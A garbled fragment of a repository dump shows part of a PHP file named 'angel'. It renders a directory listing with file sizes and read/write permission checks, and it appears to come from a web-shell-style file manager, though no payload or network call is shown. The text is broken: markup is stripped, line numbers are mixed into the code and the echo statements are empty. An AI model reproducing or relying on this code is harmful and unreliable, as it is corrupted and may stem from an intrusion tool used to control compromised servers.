| -------------------------------------------------------------------------------- /angel: -------------------------------------------------------------------------------- 1 | 4 | 10 | --------------------------------------------------------------------------------

Name	Size	Permissions	Options
$dir	--	"; 382 \| if(is_writable("$path/$dir")) echo ''; 383 \| elseif(!is_readable("$path/$dir")) echo ''; 384 \| echo perms("$path/$dir"); 385 \| if(is_writable("$path/$dir") \|\| !is_readable("$path/$dir")) echo ''; 386 \| 387 \| echo "	389 \| 395 \| 396 \| 397 \| 398 \| \" /> 399 \|

$file	".$size."	"; 417 \| if(is_writable("$path/$file")) echo ''; 418 \| elseif(!is_readable("$path/$file")) echo ''; 419 \| echo perms("$path/$file"); 420 \| if(is_writable("$path/$file") \|\| !is_readable("$path/$file")) echo ''; 421 \| echo "	423 \| 430 \| 431 \| 432 \| 433 \| \" /> 434 \|